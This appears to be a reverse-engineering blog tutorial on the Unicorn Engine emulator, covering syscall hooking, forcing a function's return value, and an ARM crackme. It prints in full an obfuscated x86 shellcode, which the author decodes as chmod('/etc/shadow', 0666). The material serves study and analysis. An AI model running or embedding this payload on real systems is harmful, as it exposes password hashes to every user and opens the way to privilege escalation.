First Steps with Unicorn Engine

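0x00: About Unicorn Engine

Unicorn Engine is an emulator: simply put, it can emulate the execution of a program or of a code fragment. That is very useful for reverse engineering, for example to figure out what a particular piece of code does. For vulnerability hunters, unicorn-afl was quite eye-catching a while back, though it still deserves deeper study.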

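0x01: About This Post

By coincidence, today's Xuanwu Lab security digest featured a Unicorn Engine tutorial. It is very well written, the author is fun, and the article even assigns homework, haha. I had no time for it at work, so I read it after getting home and, following the first example and the author's hints, did the two homework tasks.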

0x02: Analyzing the Shellcode

The author provides a piece of obfuscated shellcode here. Looking at it directly in a disassembler does not reveal what the shellcode does.

```python
shellcode = b"\xe8\xff\xff\xff\xff\xc0\x5d\x6a\x05\x5b\x29\xdd\x83\xc5\x4e\x89\xe9\x6a\x02\x03\x0c\x24\x5b\x31\xd2\x66\xba\x12\x00\x8b\x39\xc1\xe7\x10\xc1\xef\x10\x81\xe9\xfe\xff\xff\xff\x8b\x45\x00\xc1\xe0\x10\xc1\xe8\x10\x89\xc3\x09\xfb\x21\xf8\xf7\xd0\x21\xd8\x66\x89\x45\x00\x83\xc5\x02\x4a\x85\xd2\x0f\x85\xcf\xff\xff\xff\xec\x37\x75\x5d\x7a\x05\x28\xed\x24\xed\x24\xed\x0b\x88\x7f\xeb\x50\x98\x38\xf9\x5c\x96\x2b\x96\x70\xfe\xc6\xff\xc6\xff\x9f\x32\x1f\x58\x1e\x00\xd3\x80"
```
```
# muhe @ muheMacBookPro in /tmp [22:38:29]
$ python -c 'shellcode = "\xe8\xff\xff\xff\xff\xc0\x5d\x6a\x05\x5b\x29\xdd\x83\xc5\x4e\x89\xe9\x6a\x02\x03\x0c\x24\x5b\x31\xd2\x66\xba\x12\x00\x8b\x39\xc1\xe7\x10\xc1\xef\x10\x81\xe9\xfe\xff\xff\xff\x8b\x45\x00\xc1\xe0\x10\xc1\xe8\x10\x89\xc3\x09\xfb\x21\xf8\xf7\xd0\x21\xd8\x66\x89\x45\x00\x83\xc5\x02\x4a\x85\xd2\x0f\x85\xcf\xff\xff\xff\xec\x37\x75\x5d\x7a\x05\x28\xed\x24\xed\x24\xed\x0b\x88\x7f\xeb\x50\x98\x38\xf9\x5c\x96\x2b\x96\x70\xfe\xc6\xff\xc6\xff\x9f\x32\x1f\x58\x1e\x00\xd3\x80";print shellcode' > sc.dump

# muhe @ muheMacBookPro in /tmp [22:38:37]
$ file sc.dump
sc.dump: data
```

Disassembling it with r2:

```
[0x00000000]> pd
0x00000000 e8ffffffff call 4
0x00000005 c05d6a05 rcr byte [rbp + 0x6a], 5
0x00000009 5b pop rbx
0x0000000a 29dd sub ebp, ebx
0x0000000c 83c54e add ebp, 0x4e ; 'N'
0x0000000f 89e9 mov ecx, ebp
0x00000011 6a02 push 2 ; 2
0x00000013 030c24 add ecx, dword [rsp]
0x00000016 5b pop rbx
0x00000017 31d2 xor edx, edx
0x00000019 66ba1200 mov dx, 0x12 ; 18
┌─> 0x0000001d 8b39 mov edi, dword [rcx]
⁝ 0x0000001f c1e710 shl edi, 0x10
⁝ 0x00000022 c1ef10 shr edi, 0x10
⁝ 0x00000025 81e9feffffff sub ecx, 0xfffffffe
⁝ 0x0000002b 8b4500 mov eax, dword [rbp]
⁝ 0x0000002e c1e010 shl eax, 0x10
⁝ 0x00000031 c1e810 shr eax, 0x10
⁝ 0x00000034 89c3 mov ebx, eax
⁝ 0x00000036 09fb or ebx, edi
⁝ 0x00000038 21f8 and eax, edi
⁝ 0x0000003a f7d0 not eax
⁝ 0x0000003c 21d8 and eax, ebx
⁝ 0x0000003e 66894500 mov word [rbp], ax
⁝ 0x00000042 83c502 add ebp, 2
⁝ 0x00000045 4a85d2 test rdx, rdx
└─< 0x00000048 0f85cfffffff jne 0x1d
0x0000004e ec in al, dx
0x0000004f 37 invalid
┌─< 0x00000050 755d jne 0xaf
┌──< 0x00000052 7a05 jp 0x59
││ 0x00000054 28ed sub ch, ch
││ 0x00000056 24ed and al, 0xed
││ 0x00000058 24ed and al, 0xed
│ 0x0000005a 0b887feb5098 or ecx, dword [rax - 0x67af1481]
│ 0x00000060 38f9 cmp cl, bh
│ 0x00000062 5c pop rsp
│ 0x00000063 96 xchg eax, esi
│ 0x00000064 2b9670fec6ff sub edx, dword [rsi - 0x390190]
│ 0x0000006a c6 invalid
│ 0x0000006b ff9f321f581e lcall [rdi + 0x1e581f32]
│ 0x00000071 00d3 add bl, dl
│ 0x00000073 800aff or byte [rdx], 0xff
│ 0x00000076 ff invalid
│ 0x00000077 ff invalid
│ 0x00000078 ff invalid
│ 0x00000079 ff invalid
│ 0x0000007a ff invalid
│ 0x0000007b ff invalid
```

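In fact, nothing can be read from this. (r2 is also decoding the bytes as 64-bit code, hence registers such as rbp and rdx, and the leading `call 4` jumps into the middle of its own encoding, which throws off the linear disassembly.) But the author says: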

Note that the architecture is x86-32 now. List of syscalls numbers can be found here.

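So the code is 32-bit and does its work through system calls.
That means we can follow the example in the article: emulate this code, hook the system calls, print their arguments, and then skip over them.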

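On 32-bit Linux, the syscall number goes in eax and the arguments go in ebx, ecx, edx, esi, edi, in that order.
The hook below intercepts the int 0x80 instruction (bytes cd 80) and does its work there.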
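That register convention can be turned into a tiny formatter that prints a syscall the way it would look in C. A minimal sketch: the table below is a hypothetical excerpt holding only the two syscall numbers that turn up in this shellcode (1 and 15 on i386) and how many arguments each takes; `describe_syscall` is an illustrative name, not part of Unicorn.

```python
# Hypothetical excerpt of the i386 Linux syscall table: only the two numbers
# this shellcode uses, with how many arguments each takes.
SYSCALLS = {1: ("exit", 1), 15: ("chmod", 2)}

# int 0x80 convention on 32-bit Linux: number in eax, arguments in these registers
ARG_REGS = ("ebx", "ecx", "edx", "esi", "edi")


def describe_syscall(regs):
    """Format a syscall from a dict of register values, e.g. {"eax": 15, ...}."""
    number = regs["eax"]
    # unknown numbers fall back to a generic name and all five argument registers
    name, nargs = SYSCALLS.get(number, ("syscall_%d" % number, len(ARG_REGS)))
    args = ", ".join(hex(regs[r]) for r in ARG_REGS[:nargs])
    return "%s(%s)" % (name, args)


if __name__ == "__main__":
    regs = {"eax": 15, "ebx": 4194392, "ecx": 438, "edx": 0, "esi": 0, "edi": 32979}
    print(describe_syscall(regs))
```

With the register values from the first syscall this prints `chmod(0x400058, 0x1b6)`. Inside a Unicorn hook the dict could be filled from `mu.reg_read(UC_X86_REG_EAX)`, `mu.reg_read(UC_X86_REG_EBX)` and so on.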

My hook function:

```python
from unicorn import *
from unicorn.x86_const import *


def hook_code(mu, address, size, user_data):
    op_code = mu.mem_read(address, size)
    if op_code == b"\xcd\x80":                      # int 0x80: 32-bit Linux syscall
        call_number = mu.reg_read(UC_X86_REG_EAX)   # syscall number
        param1 = mu.reg_read(UC_X86_REG_EBX)        # arguments, in order
        param2 = mu.reg_read(UC_X86_REG_ECX)
        param3 = mu.reg_read(UC_X86_REG_EDX)
        param4 = mu.reg_read(UC_X86_REG_ESI)
        param5 = mu.reg_read(UC_X86_REG_EDI)

        print("[*]Result as followed:")

        print("\tCall number: {0}".format(call_number))
        print("\tParam1 : {0}".format(param1))
        print("\tParam2 : {0}".format(param2))
        print("\tParam3 : {0}".format(param3))
        print("\tParam4 : {0}".format(param4))
        print("\tParam5 : {0}".format(param5))

        # skip over int 0x80 so the syscall itself is never executed
        mu.reg_write(UC_X86_REG_EIP, address + size)

# registered with: mu.hook_add(UC_HOOK_CODE, hook_code)
```

Output:

```
$ python task1.py
[*]Result as followed:
Call number: 15
Param1 : 4194392
Param2 : 438
Param3 : 0
Param4 : 0
Param5 : 32979
[*]Result as followed:
Call number: 1
Param1 : 4194392
Param2 : 438
Param3 : 0
Param4 : 0
Param5 : 32979
```

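The fourth and fifth arguments are probably unused. The first call is syscall 15 and the second is syscall 1; looking them up, 15 is chmod and 1 is exit.
chmod takes a file name and a mode. As for exit, its argument (ebx) is 4194392, simply the value left over from the chmod call.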

What remains is to find out which file chmod operates on; 4194392 (0x400058) should be a pointer. Modify the hook:

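```python
# inside hook_code, replacing the "Call number" and "Param1" prints
print("\tCall number: {0}".format(call_number))
if call_number == 15:   # chmod: ebx (param1) points to the path
    path = mu.mem_read(param1, 32).split(b"\x00")[0].decode()
    print("\t[*]File is {0}".format(path))
else:
    print("\tParam1 : {0}".format(param1))
```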
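The modified hook reads a fixed 32 bytes and cuts at the first NUL, which is enough for "/etc/shadow" but would truncate a longer path. A minimal sketch of a chunked reader, assuming only a callable that behaves like Unicorn's `mu.mem_read(address, size)`; the name `read_c_string` and its parameters are made up for illustration.

```python
def read_c_string(read_mem, addr, chunk=16, limit=4096):
    """Read a NUL-terminated string through read_mem(addr, size) -> bytes-like.

    Reads chunk by chunk until a NUL byte shows up, so no fixed length has to
    be guessed. Raises ValueError if no terminator appears within `limit` bytes.
    """
    out = bytearray()
    while len(out) < limit:
        data = bytes(read_mem(addr + len(out), chunk))
        if not data:
            raise ValueError("memory read returned no data")
        nul = data.find(b"\x00")
        if nul != -1:
            out += data[:nul]          # keep everything before the terminator
            return bytes(out)
        out += data
    raise ValueError("no NUL terminator within %d bytes" % limit)
```

Inside the hook it would be called as `read_c_string(mu.mem_read, param1)`. One caveat the sketch ignores: if a chunk runs past the end of mapped memory, Unicorn raises a `UcError`, so a real hook may want to catch that.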

```
[*]Result as followed:
Call number: 15
[*]File is /etc/shadow
Param2 : 438
Param3 : 0
Param4 : 0
Param5 : 32979
[*]Result as followed:
Call number: 1
Param1 : 4194392
Param2 : 438
Param3 : 0
Param4 : 0
Param5 : 32979
```

chmod's second argument is just 0666 in octal:

```
>>> oct(438)
'0666'
>>>
```
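The session above is Python 2. The same check in Python 3, plus the standard `stat` module to render the mode as a permission string; the `S_IFREG` bit is added only so that `filemode` shows it as a regular file:

```python
import stat

mode = 438                                   # chmod's second argument from the hook output
print(oct(mode))                             # '0o666' in Python 3 (Python 2 prints '0666')
print(stat.filemode(stat.S_IFREG | mode))    # '-rw-rw-rw-' when applied to a regular file
```

In other words, the shellcode makes /etc/shadow readable and writable by every user.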

That completes the analysis: the shellcode calls chmod("/etc/shadow", 0666) and then exit.
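As a cross-check that needs no emulator, the decoding loop at 0x1d to 0x48 in the r2 listing can be replayed directly. Run as 32-bit code, the stub sets ebp to offset 0x4e, ecx to 0x50 and edx to 0x12; the or/and/not/and sequence computes (a | b) & ~(a & b), which is just a XOR b. The sketch below assumes exactly that reading of the listing; `decode` and its parameter names are illustrative.

```python
# The obfuscated shellcode from this section, as raw bytes.
SHELLCODE = bytes.fromhex(
    "e8 ff ff ff ff c0 5d 6a 05 5b 29 dd 83 c5 4e 89 "
    "e9 6a 02 03 0c 24 5b 31 d2 66 ba 12 00 8b 39 c1 "
    "e7 10 c1 ef 10 81 e9 fe ff ff ff 8b 45 00 c1 e0 "
    "10 c1 e8 10 89 c3 09 fb 21 f8 f7 d0 21 d8 66 89 "
    "45 00 83 c5 02 4a 85 d2 0f 85 cf ff ff ff ec 37 "
    "75 5d 7a 05 28 ed 24 ed 24 ed 0b 88 7f eb 50 98 "
    "38 f9 5c 96 2b 96 70 fe c6 ff c6 ff 9f 32 1f 58 "
    "1e 00 d3 80"
)


def decode(code, data=0x4E, key=0x50, count=0x12):
    """Replay the decoding loop at 0x1d..0x48 without an emulator.

    Each round loads the 16-bit words a = [ebp] and b = [ecx], stores
    (a | b) & ~(a & b) (== a ^ b) back to [ebp], advances both pointers by 2
    and decrements edx (byte 0x4a is "dec edx" in 32-bit mode).
    Works in place, like the shellcode: [ecx] is read before it gets decoded.
    """
    buf = bytearray(code)
    for i in range(count):
        p, q = data + 2 * i, key + 2 * i
        a = int.from_bytes(buf[p:p + 2], "little")
        b = int.from_bytes(buf[q:q + 2], "little")
        buf[p:p + 2] = ((a | b) & ~(a & b)).to_bytes(2, "little")
    return bytes(buf)


if __name__ == "__main__":
    print(decode(SHELLCODE)[0x4E:0x72].hex())
```

Read as 32-bit code, the decoded bytes at 0x4e to 0x71 are: cdq; push 0xf; pop eax; push edx; call +0xc (which pushes the address of the inline string "/etc/shadow" at 0x58); pop ebx; push 0x1b6; pop ecx; int 0x80; push 1; pop eax; int 0x80. That is chmod("/etc/shadow", 0666) followed by exit, matching the emulation output. ebx is never reset before exit, and edi still holds the last key word 0x80d3 (32979), which explains Param1 and Param5 in the second syscall.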

0x03: Changing a Function's Return Value

Alter the execution of the program below so that super_function returns 1.

```c
int strcmp(char *a, char *b)
{
    // get length
    int len = 0;
    char *ptr = a;
    while(*ptr)
    {
        ptr++;
        len++;
    }

    // compare strings
    for(int i=0; i<=len; i++)
    {
        if (a[i]!=b[i])
            return 1;
    }

    return 0;
}

__attribute__((stdcall))
int super_function(int a, char *b)
{
    if (a==5 && !strcmp(b, "batman"))
    {
        return 1;
    }
    return 0;
}

int main()
{
    super_function(1, "spiderman");
}
```

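This one is also easy: call super_function directly and, based on the stack layout, put the arguments we want in place. On x86 both cdecl and stdcall (which super_function uses) push arguments from right to left, so the pointer to the string "spiderman" is pushed first.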

```
...
saved ebp
ret addr
1
ptr ---> "spiderman\0"
...
```

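That is roughly the layout, with lower addresses at the top, as seen from inside super_function after its prologue has pushed ebp.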
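Right after the CALL and before the prologue, the same frame is simply: return address at [esp], first argument at [esp+4], second at [esp+8], all 32-bit little-endian. A minimal sketch that packs it with `struct`; `build_call_frame` is a hypothetical helper and the return address passed to it is arbitrary.

```python
import struct


def build_call_frame(ret_addr, args):
    """Lay out an x86-32 stack frame as it looks right after a CALL.

    [esp] = return address, [esp+4] = first argument, [esp+8] = second, ...
    Arguments are pushed right to left (cdecl and stdcall alike), so the first
    argument ends up at the lowest address. Values are 32-bit little-endian.
    """
    return struct.pack("<%dI" % (1 + len(args)), ret_addr, *args)
```

The task2 script later in this section gets the same effect by writing the two arguments at `r_esp+4` and `r_esp+8`; it can leave the return-address slot unset because emulation stops at the RET, so `mu.mem_write(r_esp, build_call_frame(0, [5, STRING_ADDR]))` would be an equivalent variant.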

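This part is fairly easy: compile the program yourself, then find where super_function starts and ends.

I compiled the binary on a Mac, so its addresses differ from the tutorial's; keep that in mind when writing the script. It is best to map the binary at the same base address that IDA shows for the file, so that the addresses needed to call super_function can be taken straight from IDA.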

```python
from unicorn import *
from unicorn.x86_const import *
import struct


def read(name):
    with open(name, "rb") as f:            # binary mode: Unicorn expects bytes
        return f.read()

def u32(data):
    return struct.unpack("<I", data)[0]    # x86 is little-endian

def p32(num):
    return struct.pack("<I", num)

mu = Uc(UC_ARCH_X86, UC_MODE_32)

BASE = 0x00000000
STACK_ADDR = 0x40000000
STACK_SIZE = 1024*1024

mu.mem_map(BASE, 1024*1024)
mu.mem_map(STACK_ADDR, STACK_SIZE)


mu.mem_write(BASE, read("./function"))
r_esp = STACK_ADDR + (STACK_SIZE // 2)     # ESP points to this address at function call

STRING_ADDR = 0x40000000
mu.mem_write(STRING_ADDR, b"batman\x00")   # "batman" at the bottom of the stack mapping, well below ESP

mu.reg_write(UC_X86_REG_ESP, r_esp)        # set ESP
mu.mem_write(r_esp+4, p32(5))              # first argument: the integer 5
mu.mem_write(r_esp+8, p32(STRING_ADDR))    # second argument: pointer to "batman"
# [esp] would hold the return address; it is never used because emulation stops at RET

mu.emu_start(0x0000057B, 0x000005B1)       # start at super_function, stop at its RET instruction
return_value = mu.reg_read(UC_X86_REG_EAX)
print("The returned value is: %d" % return_value)
```
```
# muhe @ muheMacBookPro in ~/Downloads [15:19:10]
$ python task2.py
The returned value is: 1
```

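0x04: An arm32 Crackme

This is similar to the first demo in the original tutorial (the CTF challenge), except that the architecture is now arm32, so mind the endianness.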

```c
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  int v3; // r0

  v3 = ccc(0x2710u, (int)argv, (int)envp);
  printf((const char *)&unk_745A4, v3);
}
```

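The goal is to compute this function's result with Unicorn, without an ARM environment -.- (never mind that I actually have one, haha).

I looked up how ARM passes arguments: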

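  1. Input arguments are passed in r0-r3, and any extra ones go on the stack. The return value goes in r0, or in {r0, r1} or {r0, r1, r2, r3} if it does not fit. For example:
    int foo(int a, int b, int c, int d): inputs r0 = a, r1 = b, r2 = c, r3 = d; returns r0 = the int retvalue
    int *foo(char a, double b, int c, char d): inputs r0 = a, r1 is skipped for alignment (a double needs 8-byte alignment), b = {r2, r3}, c at sp[0] on the stack, d at sp[4], where sp is the sp on function entry; returns r0 = the int * retvalue

  2. Returning a struct is a special case:
    struct client foo(int a, char b, float c): inputs r0 = a struct client * supplied by the caller, r1 = a, r2 = b, r3 = c; returns the same struct client * that the caller supplied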
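Point 1 boils down to a small allocation procedure over r0 to r3 and the stack. A simplified sketch, assuming the AAPCS base standard (soft-float) and scalar arguments only; the function name `assign_args` and the "word"/"dword" labels are illustrative, and structs, variadic calls and VFP (hard-float) registers are deliberately not modelled.

```python
def assign_args(kinds):
    """Simplified AAPCS placement of scalar arguments.

    kinds: list of "word" (char/short/int/pointer, 4 bytes) or
           "dword" (double/long long, 8 bytes, 8-byte aligned).
    Returns one location per argument: a tuple of core registers, or
    ("sp", offset) with the offset relative to sp at function entry.
    """
    ncrn = 0   # next core register number (r0..r3)
    nsaa = 0   # next stacked argument offset
    out = []
    for kind in kinds:
        if kind == "dword":
            if ncrn % 2:
                ncrn += 1                      # 8-byte types start at an even register
            if ncrn + 2 <= 4:
                out.append(("r%d" % ncrn, "r%d" % (ncrn + 1)))
                ncrn += 2
                continue
            ncrn = 4                           # once on the stack, no more registers
            nsaa = (nsaa + 7) & ~7             # stack slot must be 8-byte aligned
            out.append(("sp", nsaa))
            nsaa += 8
        elif kind == "word":
            if ncrn < 4:
                out.append(("r%d" % ncrn,))
                ncrn += 1
                continue
            out.append(("sp", nsaa))
            nsaa += 4
        else:
            raise ValueError("unknown argument kind: %r" % kind)
    return out
```

`assign_args(["word", "dword", "word", "word"])` reproduces the `int *foo(char, double, int, char)` example: r0, then r2:r3 (r1 skipped for alignment), then sp+0 and sp+4.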

```python
from unicorn import *
from unicorn.arm_const import *
import struct


def read(name):
    with open(name, "rb") as f:            # binary mode: Unicorn expects bytes
        return f.read()

def u32(data):
    return struct.unpack("<I", data)[0]    # this target is little-endian ARM

def p32(num):
    return struct.pack("<I", num)


mu = Uc(UC_ARCH_ARM, UC_MODE_ARM | UC_MODE_LITTLE_ENDIAN)   # 32-bit ARM (not Thumb), little-endian

BASE = 0x10000
STACK_ADDR = 0x300000
STACK_SIZE = 1024*1024

mu.mem_map(BASE, 1024*1024)
mu.mem_map(STACK_ADDR, STACK_SIZE)


mu.mem_write(BASE, read("./task4_arm"))

mu.reg_write(UC_ARM_REG_SP, STACK_ADDR + STACK_SIZE // 2)

CCC_START = 0x000104D0   # first instruction of ccc
CCC_END = 0x00010580     # last instruction of ccc

stack = []  # Stack for storing the arguments
d = {}      # Dictionary that holds return values for given function arguments

def hook_code(mu, address, size, user_data):
    if address == CCC_START:                      # Are we at the beginning of ccc?
        arg0 = mu.reg_read(UC_ARM_REG_R0)         # First argument, passed in R0

        if arg0 in d:                             # Return value already saved for this argument?
            ret = d[arg0]
            mu.reg_write(UC_ARM_REG_R0, ret)      # Set return value in R0
            # 0x105BC is a "BX LR"; LR still holds the caller's return address here,
            # so this returns from ccc at once
            mu.reg_write(UC_ARM_REG_PC, 0x105BC)
        else:
            stack.append(arg0)                    # Not saved yet: remember the argument

    elif address == CCC_END:
        arg0 = stack.pop()                        # Argument of the call that is returning now
        ret = mu.reg_read(UC_ARM_REG_R0)          # Read the return value (R0)
        d[arg0] = ret


mu.hook_add(UC_HOOK_CODE, hook_code)

mu.emu_start(0x00010584, 0x000105A8)   # run main up to 0x105A8, before the printf call

print("ret:{0}".format(mu.reg_read(UC_ARM_REG_R1)))  # R1 should hold v3, printf's second argument
```

```
# muhe @ muheMacBookPro in ~/Downloads [15:34:12]
$ python task4.py
ret:2635833876
```
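The hook memoizes ccc by pairing each entry with its exit through a LIFO stack: nested recursive calls push and pop in strict order, so the argument popped at CCC_END always belongs to the call that is returning. Since ccc's source is not shown in this post, the pure-Python model below uses a hypothetical Fibonacci-style body (the tutorial's first task memoized a Fibonacci function the same way); `emulate_call` and `fib_body` are illustrative names.

```python
def fib_body(n, call):
    """Hypothetical stand-in for ccc; call(x) plays the role of "BL ccc" with R0 = x."""
    return n if n < 2 else call(n - 1) + call(n - 2)


def emulate_call(body, arg, cache, stack, stats):
    # --- hook at CCC_START ---
    stats["entries"] += 1
    if arg in cache:
        return cache[arg]          # like writing R0 and jumping to BX LR
    stack.append(arg)              # remember which argument this activation has
    # --- the body runs; nested calls go through the same entry hook ---
    result = body(arg, lambda a: emulate_call(body, a, cache, stack, stats))
    # --- hook at CCC_END: the innermost pending call is the one returning ---
    popped = stack.pop()
    assert popped == arg           # LIFO order pairs each exit with its own entry
    cache[popped] = result
    return result


if __name__ == "__main__":
    cache, stack, stats = {}, [], {"entries": 0}
    print(emulate_call(fib_body, 30, cache, stack, stats), stats["entries"])
```

With the cache, fib(30) is entered only 59 times (2n - 1 for this left-first recursion), versus millions of entries without it, which is why the emulated ccc(10000) finishes at all.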

0x05: References

Unicorn Engine tutorial

arm平台函数传递参数,反汇编实例分析 (ARM function argument passing, with disassembly examples)